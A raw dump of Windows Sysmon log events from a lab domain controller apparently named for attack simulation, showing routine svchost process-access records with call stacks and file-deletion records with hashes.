12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005262Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005261Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005260Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.819{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005259Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.787{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005258Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.787{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005257Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.787{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005256Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.787{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005255Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.787{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005254Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.787{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005253Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.787{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005252Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.772{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\appsconversions.txtMD5=F21F68AB0FD9BF5B4255EDDDE72BE816,SHA256=9034FBD5F370A37A2E43CAE5D482B84D3ED9B6C62C6DDBC4BEE25B0526AD25EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005251Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.772{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\apps.schemaMD5=1659677C45C49A78F33551DA43494005,SHA256=5AF0FC2A0B5CCECDC04E54B3C60F28E3FF5C7D4E1809C6D7C8469F0567C090BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005250Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.772{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{93e918b8-f239-44ba-b3fb-ad2d4b5024b9}\apps.csgMD5=FB7202F6D377FD89C7B261E34D680D33,SHA256=839D24F509CA8BF8737074BF42E83A88A32EE3760BD34BBA2A7CF6CF482A1C0B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005249Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.756{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005248Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.756{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005247Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.756{266CAFBE-64C6-6064-A900-00000000AE01}3404NT 
AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\AppReadiness\S-1-5-21-4055678433-3894535204-3898404691-500MD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005246Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.725{266CAFBE-64C6-6064-A900-00000000AE01}34042980C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A700-00000000AE01}4388C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005245Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005244Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005243Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005242Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005241Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005240Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005239Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005238Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.710{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005237Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
